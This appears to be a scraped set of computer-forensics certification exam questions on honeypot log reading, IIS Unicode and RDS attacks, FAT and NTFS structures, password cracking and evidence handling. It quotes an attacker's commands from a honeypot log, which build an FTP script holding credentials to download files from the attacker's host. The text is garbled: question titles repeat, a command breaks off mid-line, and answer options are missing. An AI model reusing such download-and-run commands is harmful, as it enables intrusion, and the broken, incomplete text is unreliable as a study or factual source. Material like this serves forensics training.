What happens when a file is deleted by a Microsoft operating system using the FAT file system?
What happens when a file is deleted by a Microsoft operating system using the FAT file system?
From the options given below choose the one which best interprets the following entry…
The following excerpt is taken from a honeypot log. The log captures activities across three days.
There are several intrusion attempts; however, a few are successful. (Note: The objective of this
question is to test whether the student can read basic information from log entries and interpret the
nature of attack.) Apr 24 14:46:46 [4663]: spp_portscan: portscan detected from 194.222.156.169
Apr 24 14:46:46 [4663]: IDS27/FIN Scan: 194.222.156.169:56693 -> 172.16.1.107:482 Apr 24
18:01:05 [4663]: IDS/DNS-version-query: 212.244.97.121:3485 -> 172.16.1.107:53 Apr 24
19:04:01 [4663]: IDS213/ftp-passwd-retrieval: 194.222.156.169:1425 -> 172.16.1.107:21 Apr 25
08:02:41 [5875]: spp_portscan: PORTSCAN DETECTED from 24.9.255.53 Apr 25 02:08:07
[5875]: IDS277/DNS-version-query: 63.226.81.13:4499 -> 172.16.1.107:53 Apr 25 02:08:07
[5875]: IDS277/DNS-version-query: 63.226.81.13:4630 -> 172.16.1.101:53 Apr 25 02:38:17
[5875]: IDS/RPC-rpcinfo-query: 212.251.1.94:642 -> 172.16.1.107:111 Apr 25 19:37:32 [5875]:
IDS230/web-cgi-space-wildcard: 198.173.35.164:4221 -> 172.16.1.107:80 Apr 26 05:45:12 [6283]:
IDS212/dns-zone-transfer: 38.31.107.87:2291 -> 172.16.1.101:53 Apr 26 06:43:05 [6283]:
IDS181/nops-x86: 63.226.81.13:1351 -> 172.16.1.107:53 Apr 26 06:44:25 victim7
PAM_pwdb[12509]: (login) session opened for user simple by (uid=0) Apr 26 06:44:36 victim7
PAM_pwdb[12521]: (su) session opened for user simon by simple(uid=506) Apr 26 06:45:34
[6283]: IDS175/socks-probe: 24.112.167.35:20 -> 172.16.1.107:1080 Apr 26 06:52:10 [6283]:
IDS127/telnet-login-incorrect: 172.16.1.107:23 -> 213.28.22.189:4558 From the options given
below choose the one which best interprets the following entry: Apr 26 06:43:05 [6283]:
IDS181/nops-x86: 63.226.81.13:1351 -> 172.16.1.107:53
“cmd1.exe /c open 213.116.251.162 >ftpcom” “cmd1.exe /c echo johna2k >>ftpcom” “cmd1.exe /c
The following excerpt is taken from a honeypot log that was hosted at laB. wiretrip.net. Snort
reported Unicode attacks from 213.116.251.162. The File Permission Canonicalization
vulnerability (UNICODE attack) allows scripts to be run in arbitrary folders that do not normally
have the right to run scripts. The attacker tries a Unicode attack and eventually succeeds in
displaying boot.ini. He then switches to playing with RDS, via msadcs.dll. The RDS vulnerability
allows a malicious user to construct SQL statements that will execute shell commands (such as
CMD. EXE) on the IIS server. He does a quick query to discover that the directory exists, and a
query to msadcs.dll shows that it is functioning correctly. The attacker makes a RDS query which
results in the commands run as shown below.
“cmd1.exe /c open 213.116.251.162 >ftpcom”
“cmd1.exe /c echo johna2k >>ftpcom”
“cmd1.exe /c echo
haxedj00 >>ftpcom”
“cmd1.exe /c echo get n
What is the actual error code that you would see in the log for resource not found?
When reviewing web logs, you see an entry for resource not found in the HTTP status code fileD.
What is the actual error code that you would see in the log for resource not found?
What are two common methods used by password cracking software that you can use to obtain the password?
You are called in to assist the police in an investigation involving a suspected drug dealer. The
suspects house was searched by the police after a warrant was obtained and they located a floppy
disk in the suspects bedroom. The disk contains several files, but they appear to be password
protecteD. What are two common methods used by password cracking software that you can use
to obtain the password?
When examining a hard disk without a write-blocker, you should not start windows because Windows will write da
When examining a hard disk without a write-blocker, you should not start windows because
Windows will write data to the:
Will you be able to break the encryption so that you can verify that that the employee was in possession of th
An Employee is suspected of stealing proprietary information belonging to your company that he
had no rights to possess. The information was stored on the Employees Computer that was
protected with the NTFS Encrypted File System (EFS) and you had observed him copy the files to
a floppy disk just before leaving work for the weekenD. You detain the Employee before he leaves
the building and recover the floppy disks and secure his computer. Will you be able to break the
encryption so that you can verify that that the employee was in possession of the proprietary
information?
What type of file is represented by a colon (:) with a name following it in the Master File Table of NTFS disk
What type of file is represented by a colon (:) with a name following it in the Master File Table of
NTFS disk?
In Microsoft file structures, sectors are grouped together to form:
In Microsoft file structures, sectors are grouped together to form:
What do you think you should do if the evidence you found appears to be exculpatory and is not being released
While working for a prosecutor, What do you think you should do if the evidence you found
appears to be exculpatory and is not being released to the defense ?